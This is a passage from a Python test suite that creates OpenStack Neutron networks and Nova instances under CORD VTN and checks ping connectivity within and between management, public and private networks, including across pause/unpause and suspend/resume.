result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'], check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_with_management_network_creating_two_instances_and_validate_connectivity_between_two(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create first nova instance under management network
5. Validate first nova instance is created on nova service
6. Create second nova instance under management network
7. Validate second nova instance is created on nova service
8. Try to ping from one nova instance to the other; the ping should not succeed
"""
test_net_name = 'vtn_test_19_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.2", "172.27.0.200"]
test_management_type = "management_local"
first_instance_vm_name = 'vtn_test_19_nova_1st_instance_management_net'
second_instance_vm_name = 'vtn_test_19_nova_2nd_instance_management_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
first_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,first_instance_vm_name,image_name,flavor_id)
second_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,second_instance_vm_name,image_name,flavor_id)
assert_equal(first_nova_instance_details.status, 'ACTIVE')
assert_equal(second_nova_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print first_nova_instance_details.addresses
print second_nova_instance_details.addresses
address_1st_instance = first_nova_instance_details.addresses
address_2nd_instance = second_nova_instance_details.addresses
print 'Nova 1st instance management ip = %s'%(address_1st_instance[test_net_name][0]['addr'])
print 'Nova 2nd instance management ip = %s'%(address_2nd_instance[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_net_name][0]['addr'],source_tenants_details =address_2nd_instance[test_net_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, first_nova_instance_details)
self.nova_instance_deletion(nova, second_nova_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_two_management_network_instances_and_validate_connectivity_between_two_networks_via_management_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
"""
test_netA_name = 'vtn_test_20_netA_management'
test_sub_netA_cidr = ["management","172.27.0.0/24","172.27.0.2", "172.27.0.200"]
netA_instance_vm_name = 'vtn_test_20_nova_netA_instance_management_net'
test_netB_name = 'vtn_test_20_netB_management'
test_sub_netB_cidr = ["management","172.28.0.0/24","172.28.0.2", "172.28.0.200"]
netB_instance_vm_name = 'vtn_test_20_nova_netB_instance_management_net'
test_management_type = "management_local"
image_name = "vsg-1.1"
flavor_id = 'm1.small'
netA_instance_vm_details = [netA_instance_vm_name, image_name, flavor_id]
netB_instance_vm_details = [netB_instance_vm_name, image_name, flavor_id]
nova_netA, nova_instance_details_netA = self.create_net_subnet_nova_instance(test_netA_name, test_sub_netA_cidr, netA_instance_vm_details, test_management_type)
nova_netB, nova_instance_details_netB = self.create_net_subnet_nova_instance(test_netB_name, test_sub_netB_cidr, netB_instance_vm_details, test_management_type)
assert_equal(nova_instance_details_netA.status, 'ACTIVE')
assert_equal(nova_instance_details_netB.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print nova_instance_details_netA.addresses
print nova_instance_details_netB.addresses
address_1st_instance = nova_instance_details_netA.addresses
address_2nd_instance = nova_instance_details_netB.addresses
print 'Nova 1st instance management ip = %s'%(address_1st_instance[test_netA_name][0]['addr'])
print 'Nova 2nd instance management ip = %s'%(address_2nd_instance[test_netB_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_netA_name][0]['addr'],source_tenants_details =address_2nd_instance[test_netB_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova_netA, nova_instance_details_netA)
self.nova_instance_deletion(nova_netB, nova_instance_details_netB)
time.sleep(5)
self.neutron_network_deletion(test_netA_name)
self.neutron_network_deletion(test_netB_name)
assert_equal(status, False)
def test_cordvtn_creating_public_network_instance_and_validate_connectivity_from_host_machine_or_compute_node(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under public network
5. Validate new nova instance is created on nova service
6. Verify ping from the compute node to the nova instance created in step 4 does not succeed.
"""
test_net_name = 'vtn_test_21_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
test_management_type = "public"
instance_vm_name = 'vtn_test_21_nova_instance_public_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance public ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_public_network_instance_and_validate_connectivity_to_external_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under public network
5. Validate new nova instance is created on nova service
6. Verify the nova instance cannot reach an external network (ping from it should fail).
"""
test_net_name = 'vtn_test_22_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
test_management_type = "public"
instance_vm_name = 'vtn_test_22_nova_instance_public_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance public ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'], check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_public_network_with_two_instances_and_validate_connectivity_between_two(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create first nova instance under public network
5. Validate first nova instance is created on nova service
6. Create second nova instance under public network
7. Validate second nova instance is created on nova service
8. Try to ping from one nova instance to the other; the ping should not succeed
"""
test_net_name = 'vtn_test_23_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
test_management_type = "public"
first_instance_vm_name = 'vtn_test_23_nova_1st_instance_public_net'
second_instance_vm_name = 'vtn_test_23_nova_2nd_instance_public_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
first_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,first_instance_vm_name,image_name,flavor_id)
second_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,second_instance_vm_name,image_name,flavor_id)
assert_equal(first_nova_instance_details.status, 'ACTIVE')
assert_equal(second_nova_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print first_nova_instance_details.addresses
print second_nova_instance_details.addresses
address_1st_instance = first_nova_instance_details.addresses
address_2nd_instance = second_nova_instance_details.addresses
print 'Nova 1st instance public ip = %s'%(address_1st_instance[test_net_name][0]['addr'])
print 'Nova 2nd instance public ip = %s'%(address_2nd_instance[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_net_name][0]['addr'],source_tenants_details =address_2nd_instance[test_net_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, first_nova_instance_details)
self.nova_instance_deletion(nova, second_nova_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_two_public_network_instances_and_check_connectvity_between_two_networks_via_public_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under public network
5. Validate new nova instance is created on nova service
"""
test_netA_name = 'vtn_test_24_netA_public'
test_sub_netA_cidr = ["public","10.6.1.192/26",'10.6.1.193']
netA_instance_vm_name = 'vtn_test_24_nova_netA_instance_public_net'
test_netB_name = 'vtn_test_24_netB_public'
test_sub_netB_cidr = ["public","10.6.2.192/26",'10.6.2.193']
netB_instance_vm_name = 'vtn_test_24_nova_netB_instance_public_net'
test_management_type = "public"
image_name = "vsg-1.1"
flavor_id = 'm1.small'
netA_instance_vm_details = [netA_instance_vm_name, image_name, flavor_id]
netB_instance_vm_details = [netB_instance_vm_name, image_name, flavor_id]
nova_netA, nova_instance_details_netA = self.create_net_subnet_nova_instance(test_netA_name, test_sub_netA_cidr, netA_instance_vm_details, test_management_type)
nova_netB, nova_instance_details_netB = self.create_net_subnet_nova_instance(test_netB_name, test_sub_netB_cidr, netB_instance_vm_details, test_management_type)
assert_equal(nova_instance_details_netA.status, 'ACTIVE')
assert_equal(nova_instance_details_netB.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print nova_instance_details_netA.addresses
print nova_instance_details_netB.addresses
address_1st_instance = nova_instance_details_netA.addresses
address_2nd_instance = nova_instance_details_netB.addresses
print 'Nova 1st instance public ip = %s'%(address_1st_instance[test_netA_name][0]['addr'])
print 'Nova 2nd instance public ip = %s'%(address_2nd_instance[test_netB_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_netA_name][0]['addr'],source_tenants_details =address_2nd_instance[test_netB_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova_netA, nova_instance_details_netA)
self.nova_instance_deletion(nova_netB, nova_instance_details_netB)
time.sleep(5)
self.neutron_network_deletion(test_netA_name)
self.neutron_network_deletion(test_netB_name)
assert_equal(status, False)
def test_cordvtn_creating_private_network_instance_and_validate_connectivity_from_host_machine_or_compute_node(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under private network
5. Validate new nova instance is created on nova service
6. Verify ping from the compute node to the nova instance created in step 4 does not succeed.
"""
test_net_name = 'vtn_test_25_net_private'
test_sub_net_cidr = ["private","10.160.160.192/26",'10.160.160.193']
test_management_type = "private"
instance_vm_name = 'vtn_test_25_nova_instance_private_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance private ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_private_network_instance_and_validate_connectivity_to_external_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under private network
5. Validate new nova instance is created on nova service
6. Verify the nova instance cannot reach an external network (ping from it should fail).
"""
test_net_name = 'vtn_test_26_net_private'
test_sub_net_cidr = ["private","10.160.160.192/26",'10.160.160.193']
test_management_type = "private"
instance_vm_name = 'vtn_test_26_nova_instance_private_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance private ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'], check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_private_network_with_two_instances_and_check_connectvity_between_two_instances(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create first nova instance under private network
5. Validate first nova instance is created on nova service
6. Create second nova instance under private network
7. Validate second nova instance is created on nova service
8. Try to ping from one nova instance to the other; the ping should not succeed
"""
test_net_name = 'vtn_test_27_net_private'
test_sub_net_cidr = ["private","10.160.160.192/26",'10.160.160.193']
test_management_type = "private"
first_instance_vm_name = 'vtn_test_27_nova_1st_instance_private_net'
second_instance_vm_name = 'vtn_test_27_nova_2nd_instance_private_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
first_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,first_instance_vm_name,image_name,flavor_id)
second_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,second_instance_vm_name,image_name,flavor_id)
assert_equal(first_nova_instance_details.status, 'ACTIVE')
assert_equal(second_nova_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print first_nova_instance_details.addresses
print second_nova_instance_details.addresses
address_1st_instance = first_nova_instance_details.addresses
address_2nd_instance = second_nova_instance_details.addresses
print 'Nova 1st instance private ip = %s'%(address_1st_instance[test_net_name][0]['addr'])
print 'Nova 2nd instance private ip = %s'%(address_2nd_instance[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_net_name][0]['addr'],source_tenants_details =address_2nd_instance[test_net_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, first_nova_instance_details)
self.nova_instance_deletion(nova, second_nova_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_two_private_network_instances_and_validate_connectivity_between_two_networks_via_private_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under private network
5. Validate new nova instance is created on nova service
"""
test_netA_name = 'vtn_test_28_netA_private'
test_sub_netA_cidr = ["private","10.160.160.192/26",'10.160.160.193']
netA_instance_vm_name = 'vtn_test_28_nova_netA_instance_private_net'
test_netB_name = 'vtn_test_28_netB_private'
test_sub_netB_cidr = ["private","10.160.161.192/26",'10.160.161.193']
netB_instance_vm_name = 'vtn_test_28_nova_netB_instance_private_net'
test_management_type = "private"
image_name = "vsg-1.1"
flavor_id = 'm1.small'
netA_instance_vm_details = [netA_instance_vm_name, image_name, flavor_id]
netB_instance_vm_details = [netB_instance_vm_name, image_name, flavor_id]
nova_netA, nova_instance_details_netA = self.create_net_subnet_nova_instance(test_netA_name, test_sub_netA_cidr, netA_instance_vm_details, test_management_type)
nova_netB, nova_instance_details_netB = self.create_net_subnet_nova_instance(test_netB_name, test_sub_netB_cidr, netB_instance_vm_details, test_management_type)
assert_equal(nova_instance_details_netA.status, 'ACTIVE')
assert_equal(nova_instance_details_netB.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print nova_instance_details_netA.addresses
print nova_instance_details_netB.addresses
address_1st_instance = nova_instance_details_netA.addresses
address_2nd_instance = nova_instance_details_netB.addresses
print 'Nova 1st instance private ip = %s'%(address_1st_instance[test_netA_name][0]['addr'])
print 'Nova 2nd instance private ip = %s'%(address_2nd_instance[test_netB_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_netA_name][0]['addr'],source_tenants_details =address_2nd_instance[test_netB_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova_netA, nova_instance_details_netA)
self.nova_instance_deletion(nova_netB, nova_instance_details_netB)
time.sleep(5)
self.neutron_network_deletion(test_netA_name)
self.neutron_network_deletion(test_netB_name)
assert_equal(status, False)
def test_cordvtn_creating_management_and_public_network_instances_and_validate_connectivity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping from the compute node to the nova instance created in step 4 and ping from the instance to an external network are successful.
"""
test_two_networks_name = ['vtn_test_29_net_management','vtn_test_29_net_public']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["public","10.6.1.192/26",'10.6.1.193']]
test_management_type = ["management_local", 'public']
instance_vm_name = 'vtn_test_29_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and public ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_management_and_public_network_instance_with_and_without_pause_and_validate_connectivity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping from the compute node to the nova instance created in step 4 and ping from the instance to an external network are successful.
7. Now pause the nova instance and check connectivity
8. Now unpause the nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_30_net_management','vtn_test_30_net_public']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["public","10.6.1.192/26",'10.6.1.193']]
test_management_type = ["management_local", 'public']
instance_vm_name = 'vtn_test_30_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and public ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_instance_details.pause()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_instance_details.unpause()
        print 'Nova instance was paused and unpaused, now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_management_and_public_network_instance_doing_suspend_and_resume_validating_connectivity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create subnetworks whose IPs are under the management and public networks
        2. Do a GET REST API call and validate creation of the networks
        3. Create a new nova instance on the management and public networks
        4. Validate that the new nova instance is created on the nova service
        5. Verify that ping from the compute node to the nova instance created in step 3 is successful
        6. Now suspend the nova instance and check connectivity
        7. Now resume the nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_31_net_management','vtn_test_31_net_public']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["public","10.6.1.192/26",'10.6.1.193']]
test_management_type = ["management_local", 'public']
instance_vm_name = 'vtn_test_31_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and public ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="tcp",
        #                                 from_port="22", to_port="22",
        #                                 cidr="0.0.0.0/0")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="icmp",
        #                                 from_port=-1, to_port=-1,
        #                                 cidr="0.0.0.0/0")
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is False or status_2 is False:
